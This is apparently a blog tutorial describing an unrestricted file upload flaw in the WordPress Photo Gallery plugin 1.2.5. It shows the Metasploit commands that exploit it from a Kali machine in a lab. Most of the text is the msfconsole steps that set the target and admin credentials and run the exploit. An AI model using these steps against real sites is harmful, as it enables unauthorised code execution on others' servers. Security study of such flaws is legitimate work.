Exploit Remote PC using WordPress Photo Gallery Unrestricted File Upload

Photo Gallery Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the photo-gallery\photo-gallery.php script allows access to filemanager\UploadHandler.php. The post () method in UploadHandler.php does not properly verify or sanitize user-uploaded files.

Exploit Targets
Photo Gallery Plugin, version 1.2.5.

Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set targeturi wordpress
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rhost (IP of Remote Host)
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set username admin
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set password admin123
msf exploit (wp_photo_gallery_unrestricted_file_upload)>exploit     


Post a Comment